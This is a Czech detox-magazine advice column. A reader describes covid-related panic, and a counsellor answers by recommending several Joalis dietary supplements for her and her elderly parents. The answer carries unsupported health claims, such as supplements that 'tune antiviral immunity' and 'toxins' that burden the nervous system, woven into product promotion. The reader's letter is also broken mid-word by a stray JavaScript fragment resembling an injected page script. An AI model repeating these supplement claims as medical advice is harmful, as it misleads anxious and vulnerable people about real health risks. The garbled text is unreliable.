Poradna

Meduňčina detoxikační poradna s Vlaďkou Málovou: říjen

Už mě to nebaví aneb panika a strach…

Dobrý den,
obracím se na vás s prosbou o pomoc. Je mi 55 let, uvažuji racionálně, panikám standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardně nepodléhám. Přesto mě nyní začíná dohánět současná situace. Nemám strach o sebe, ale o rodiče. Často sledují televizi, nejsou už moc pohybově aktivní, tak je to jejich hlavní styk se „světem.“
No a k tomu se váže můj dotaz. Byla jsem na oslavě, která probíhala z velké části venku, a asi jsem prochladla. Pár dní jsem měla trochu kašel, lehkou rýmu, nic mimořádného, i jsem byla bez teplot. Dokud jsem potíže brala jako nachlazení, neměla jsem problém s dýcháním. Ve chvíli, kdy jsem si připustila, že by to mohl být covid (a já bych mohla ohrozit rodiče), začala jsem mít pocit, že nemohu dýchat. Byla jsem raději i na testu a byl negativní. Bohužel se stále necítím úplně dobře. Asi jsem blázen, ale kdykoliv si připustím, že bych mohla být pozitivní a nakazit rodiče, začnu panikařit. Hůře se mi dýchá, rozbolí mě hlava a začnu pociťovat únavu. I když si opakuji, že je vše v pořádku, stejně mé tělo reaguje takto.
A ještě dotaz, co dát případně rodičům, protože určitě i při běžné viróze nebo nachlazení propadnou panice.
Prosím, poraďte, co s tím. Děkuji, Eva

Dobrý den,
děkuji vám za dotaz, který se netýká jen vás. Rozdělím svou odpověď na dvě části.
První část – příznaky virózy, nachlazení apod.
Druhá část – jak nepodlehnout panice a tím nezhoršit stav.

Příznaky virózy, nachlazení apod.
I u zdravých lidí, kteří nebývají často nemocní, se může tu a tam objevit nějaké nachlazení, to je normální. Doporučila bych vám kombinaci doplňků stravy Joalis – Joalis Imun a Joalis Gripin. Tyto dva ještě doplnit o přípravek VelienDren, který umí vyladit protivirovou imunitu organismu.

Nepodlehnout panice a tím nezhoršit stav
Chápu vás, je přirozené bát se o své blízké a vaše tělo reaguje normálně. Negativní emocionální programy vykonávají své, stojí v pozadí toho, jak situace náš organismus vnímá, vyhodnocuje a podle nich se i chová.

Zhoršení vašeho stavu ve chvílích obav má na svědomí autonomní nervový systém (ANS). Je to nervový systém, který neovlivníme silou vůle. Strach o sebe a své blízké vyvolá dominový efekt reakcí, jedná se o základní instinkt.

Otázka je, jestli je adekvátní, jestli nereaguje přehnaně. Každé zatížení autonomního nervového systému jakýmkoli toxinem (anorganickým, mikrobiálním atd.) zhorší jeho reakce.

Každá citlivost na změny počasí, na úplněk, na tlak, bolesti břicha bez nálezu, časté močení, průjem ve stresu atd. To všechno jsou reakce, za kterými stojí zatížený ANS. Čím více je ANS zatížený, tím menší podnět stačí k nepřiměřené reakci.

Jestliže se bojíte (a to je normální, v pořádku), tak ANS reaguje více nebo méně, podle zatížení.

Co dělat teď, když teď čelíme takto výjimečné situace? Prožíváme to všichni a starší generace, nemocní lidé o to více. Přidejte k výše zmíněným přípravkům ještě Joalis Emoce a Joalis Vegeton.

Doplněk stravy Joalis Emoce pomůže udržet emoce v mezích, a přípravek Joalis Vegeton pomůže udržet „v klidu“ ANS.

Doporučuji tedy pro vás, ale i pro rodiče nebo kohokoli tuto kombinaci: Joalis Imun, Joalis Gripin, Joalis VelienDren a Joalis Emoce. Plus u citlivých lidí ještě Joalis Vegeton.

Zaměstnejme ruce a zaměstnáme hlavu

Teď rada nejen pro vás a vaše rodiče, ale i pro všechny čtenáře. Zkuste sobě a hlavně rodičům vymyslet činnost, na kterou přenesou myšlenky, a tím jim pomůžete odvést pozornost od současného tématu.
Zamyslete se, co rádi dělají, jaké mají koníčky, nebo je poproste, aby vám něco vyrobili, kupte jim puzzle, poproste je o napsání oblíbených receptů, upletení ponožek, zkrátka cokoliv, co odvede jejich pozornost k něčemu milému, pozitivnímu a oni se budou cítit potřební a ucítí opět po delší době RADOST. Ostatně to platí pro nás všechny.
Jakýmkoliv tvořením zapojíte pracovní část mozku a uklidníte tak limbický – emocionální systém. Organizmus se tak zklidní a uvolní, s ním i autonomní nervový systém.

Hodně zdraví a radosti nám všem, Vlaďka Málová

Vlaďka Málová působí v Praze v Centru C. I. C. (Křišťanova 20, Praha 3) a v Jablonci nad Nisou v Centru zdraví – Radost (Poštovní 8, Jablonec nad Nisou). Své dotazy jí můžete posílat na email: poradna@vladkamalova.cz, do předmětu uveďte Poradna Meduňka.
Více informací najdete na webu www.joalis.cz.